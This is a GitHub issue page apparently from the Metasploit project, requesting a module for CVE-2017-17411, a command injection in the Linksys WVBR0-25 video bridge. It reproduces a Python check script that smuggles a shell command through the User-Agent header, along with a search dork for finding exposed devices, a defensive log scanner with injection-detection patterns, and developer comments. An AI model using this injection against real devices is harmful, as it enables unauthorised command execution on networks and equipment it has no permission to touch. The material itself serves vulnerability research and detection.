Metasploit-framework: [request] CVE-2017-17411 - Linksys WVBR0 25 Command Injection

Created on 15 Dec 2017 · 7 Comments · Source: rapid7/metasploit-framework

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import logging
import requests

log = logging.getLogger(__name__)


def check(url):
    # The payload is sent as the User-Agent header. It closes the quoted
    # shell argument the device builds from that header and appends an
    # echo whose output can be recognised in the response.
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum

    resp = send_http_request(url, payload)

    if not resp:
        return False

    # The page lists executed commands as "config.webui sys_cmd" lines.
    # list() so the result can be iterated twice (filter() is a one-shot
    # iterator on Python 3).
    lines = resp.text.splitlines()
    sys_cmds = list(filter(lambda x: "config.webui sys_cmd" in x, lines))

    # Both the injected payload and the hash of its output must appear.
    if not any(payload in sys_cmd for sys_cmd in sys_cmds):
        return False

    if not any(md5hash in sys_cmd for sys_cmd in sys_cmds):
        return False

    print("[+] Target is exploitable by CVE-2017-17411")
    return True


def send_http_request(url, payload):
    headers = {
        'User-Agent': payload
    }

    response = None
    try:
        # timeout so an unresponsive host does not hang the check
        response = requests.get(url, headers=headers, timeout=10)
    except Exception as err:
        log.exception(err)

    return response


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)

    check(sys.argv[1])


# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

References

  1. https://github.com/nixawk/labs/blob/master/CVE-2017-17411/exploit-CVE-2017-17411.py
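As an added defender-side example (not part of this issue, the script above, or the Metasploit module), the Python 3 snippet below parses combined-format web-server access logs and flags User-Agent values shaped like the injection the check script sends: a quote followed by a semicolon, backtick or `$(` command substitution, or a pipe into a command. The log lines, IP addresses, timestamps and rule names are constructed for the example; a bare `;` is deliberately not a rule because ordinary browser User-Agents contain it.

```python
#!/usr/bin/env python3
# Added example: scan access logs for User-Agent values carrying shell
# command-injection sequences. Not code from the original issue.
import re

# Common "combined" access-log format. Quoted fields may contain
# backslash-escaped quotes, which is how a server logs a UA such as
# "; echo "admin (the payload used by the check script).
_COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Each rule is (name, pattern). Breaking out of a quoted shell argument
# needs a quote before the ';', so that pair is the first rule; a lone
# ';' would match legitimate UAs like "(X11; Linux x86_64)".
_RULES = [
    ("quote-then-semicolon", re.compile(r'["\']\s*;')),
    ("backtick-substitution", re.compile(r'`')),
    ("dollar-paren-substitution", re.compile(r'\$\(')),
    ("pipe-to-command", re.compile(r'\|\s*[A-Za-z]')),
]


def unescape_log_field(field):
    """Undo the backslash escaping a web server applies to quoted fields."""
    return field.replace('\\"', '"').replace('\\\\', '\\')


def parse_combined(line):
    """Return a dict of fields for one combined-format line, or None."""
    m = _COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ua"] = unescape_log_field(rec["ua"])
    rec["referer"] = unescape_log_field(rec["referer"])
    return rec


def suspicious_user_agent(ua):
    """Return the name of the first injection rule that matches, else None."""
    for name, pattern in _RULES:
        if pattern.search(ua):
            return name
    return None


def scan(lines):
    """Return a list of (ip, user_agent, rule_name) for every flagged line."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        rule = suspicious_user_agent(rec["ua"])
        if rule:
            hits.append((rec["ip"], rec["ua"], rule))
    return hits


# Constructed sample lines; IPs, timestamps and sizes are made up.
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Dec/2017:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/57.0"',
    # The check script's payload as a server would log it (quotes escaped)
    '10.0.0.9 - - [15/Dec/2017:10:01:07 +0000] "GET / HTTP/1.1" 200 734 "-" '
    '"\\"; echo \\"admin"',
    '10.0.0.9 - - [15/Dec/2017:10:01:09 +0000] "GET /status HTTP/1.1" 200 734 "-" '
    '"curl/7.58.0"',
    '10.0.0.12 - - [15/Dec/2017:10:02:00 +0000] "GET / HTTP/1.1" 200 734 "-" '
    '"Mozilla/5.0 `id`"',
]

if __name__ == "__main__":
    for ip, ua, rule in scan(SAMPLE_LOGS):
        print("[!] %s  rule=%s  ua=%r" % (ip, rule, ua))
```

Run against a real log the rules will still produce the occasional false positive (some SDK User-Agents use odd punctuation), so treat a hit as a lead to pivot on by source IP and time, not as a verdict; the scanner only sees the request side and cannot tell whether the device actually executed anything.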

All 7 comments

I'm planning on working on this over the Holiday, if no one else gets to it by then I'll push a PR.

I've got one written and ready to go btw. I can submit a PR tomorrow since the vendor should be done rolling out updates tonight.

Obviously that's really great that there will be a module available sooner than planned. I just wish I had known before I ordered the component :-( I was really looking forward to working on this module. Anyways, @headlesszeke it's a really cool bug and I'm glad you're contributing a module for it!

Heh, well there's a very good chance your module will be better than mine. But also I don't think this is the only bug that exists in this device, so it should be money well spent regardless.

That's quite kind of you to say, but I highly doubt my module would be better than yours. I'll look forward to playing around with the device when it arrives. Who knows, maybe we'll be going through this whole patching process again in a few weeks ;-)

#9336 Pull request made. Let me know if there are issues.

Landed in #9336
